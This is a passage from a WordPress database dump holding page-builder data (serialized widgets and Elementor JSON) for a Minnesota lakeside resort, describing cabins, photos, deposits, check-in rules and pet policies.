Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.</p>\n<p>A 3% PROCESSING FEE WILL BE ADDED FOR ALL CREDIT AND DEBIT CARD USAGE.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1563228778737\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-89410002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-89410003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2879,899,'_elementor_edit_mode','builder'),(2880,899,'_elementor_template_type','post'),(2881,899,'_elementor_version','2.5.16'),(2882,899,'_wp_page_template','default'),(2883,899,'_elementor_data','[{\"id\":\"f523c97\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5afd9c7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"79c352d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4cd61c\"}]},\"elements\":[{\"id\":\"c7622c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"013e706\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2a9bf7b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4aff54c\"}]},\"elements\":[{\"id\":\"31f7a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>We are now taking reservations for next summer !!<\\/h2><p><strong>Love to stay at a Cabin - <span style=\\\"text-decoration: underline;\\\"><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/span><\\/strong><\\/p><p>Cabins are available weekly only\\u00a0 (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.<\\/p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\\\"http:\\/\\/ashbyresort.com\\/campground-map\\/\\\">(see map)<\\/a><\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a763503\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3f28486\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"76a9305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ec644e\"}]},\"elements\":[{\"id\":\"c20b05e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d36d555\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b3d4418\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bc32c7b\"}]},\"elements\":[{\"id\":\"44df606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 10\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25a558f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-001.jpg\",\"id\":286}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5430be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom , 1 bath<\\/strong><\\/p><p><strong>2\\u00a0queen beds, 1 double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"666a77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3c6e3e6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3cf59d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"69505cd\"}]},\"elements\":[{\"id\":\"ec73946\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 11\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c5f5023\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/cabin11.jpg\",\"id\":282}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a9b3aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-1-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"6\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom, 1 bath<\\/strong><\\/p><p><strong>\\u00a02 queen\\u00a0beds, 1\\u00a0double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2887,900,'_wp_page_template','default'),(2888,900,'_elementor_edit_mode','builder'),(2889,900,'_elementor_template_type','post'),(2890,900,'_elementor_version','2.5.16'),(2891,900,'_elementor_data','[{\"id\":\"50e917a\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b6ee1cc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c15ef20\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6364ee2\"}]},\"elements\":[{\"id\":\"25a144c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1bbc9a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a12116a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74c336e\"}]},\"elements\":[{\"id\":\"e69cdee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><span style=\\\"text-decoration: underline;\\\">Now booking for next summer !!!<\\/span><\\/h2><h3>Love to stay in a Newer Cabin \\u2013 <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us to book it 218-747-2959<\\/a><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"71c9c9f\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"daa79a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8b7f04d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"02be74a\"}]},\"elements\":[{\"id\":\"91a0fc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5009976\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"cc92fdd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38976b4\"}]},\"elements\":[{\"id\":\"2dd3697\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#13<\\/strong><\\/p><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0de354b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"51563f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a399b62\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c6ce686\"}]},\"elements\":[{\"id\":\"90da9a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bac4c3c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691551b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a6da7ce\"}]},\"elements\":[{\"id\":\"5a1fef2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC05132-1.jpg\",\"id\":350}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05fe721\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48b0790\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dc779e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"10aea88\"}]},\"elements\":[{\"id\":\"4de5a2c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3937.jpg\",\"id\":378}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5333298\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"13c67c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12adb22\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e5ee1fc\"}]},\"elements\":[{\"id\":\"58909e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939.jpg\",\"id\":380}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1d6275\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94dfae0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1a806a0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db0a78a\"}]},\"elements\":[{\"id\":\"d4a2c33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e2ad2df\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"169f623\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"94e664c\"}]},\"elements\":[{\"id\":\"24c7810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3946.jpg\",\"id\":386}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910371e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc94767\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12bcc27\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3b5c83\"}]},\"elements\":[{\"id\":\"af9c607\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ca993d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7307f5a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1e3851b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8d18dbc\"}]},\"elements\":[{\"id\":\"5cbedc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3938.jpg\",\"id\":379}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ac3587\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66bd1f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"eb116ed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6eb21bc\"}]},\"elements\":[{\"id\":\"98126ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"45ebf30\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"237e527\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e166c30\"}]},\"elements\":[{\"id\":\"6ad4744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#14<\\/strong><br \\/>Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br \\/>The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br \\/>This is a No Smoking, no Pets unit. test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d0a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2699905\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50936de\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"93a9ddc\"}]},\"elements\":[{\"id\":\"3473758\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9a06343\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"46d7bbd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"596cd90\"}]},\"elements\":[{\"id\":\"0ebaaa5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/newCabin14.jpg\",\"id\":317}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"916a3db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1c96d80\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dffc8b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1276762\"}]},\"elements\":[{\"id\":\"c80be6a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3941.jpg\",\"id\":381}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b322842\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ba166f6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c21e44\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"83a5d56\"}]},\"elements\":[{\"id\":\"6189189\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2896,903,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:330:\"Call us at 218-747-2959 for reservations \n<strong>NO checkins after 10:00 PM !!</strong>\n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  BALANCE IS DUE UPON ARRIVAL.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW.\nALL GUESTS MUST CHECK IN AT THE RESORT OFFICE UPON ARRIVAL.\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1564831769562\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:1078:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups 